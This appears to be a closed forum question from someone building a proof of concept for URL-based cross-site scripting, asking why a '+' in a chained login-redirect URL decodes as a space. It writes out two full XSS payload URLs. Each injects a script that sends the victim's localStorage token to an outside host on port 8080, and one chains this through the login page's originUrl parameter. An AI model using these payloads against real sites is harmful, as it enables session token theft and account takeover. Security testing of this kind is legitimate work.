28Mar
+ is decoded by the browser as space [closed]
I am trying to PoC an XSS in the URL, and I have it working fine with the below URL:
https://example.com:15000/test/%3Cscript%20type=%22text/javascript%22%3Edocument.location=%22http://192.168.1.88:8080/%3fc=%22+localStorage.getItem(%22token%22);%3C/script%3E
Now I wanted to go further with this PoC and craft a URL that lets the end user access the login page and then get redirected to the infected URL, so I crafted the below URL:
https://example:15000/login/?originUrl=https://example:15000/test/%3Cscript%20type=%22text/javascript%22%3Edocument.location=%22http://10.36.57.10:8080/%253fc=%22+localStorage.getItem(%22token%22);%3C/script%3E&client_id=ui-client
When I hit this in the browser and intercept the call through Burp, the + before the localStorage is being decoded as space!
I also tried to encode the +, but it is still decoded as a white space.
Noting that the first link is working fine and the + is not decoded as white space, why am I getting this issue when I use the second link?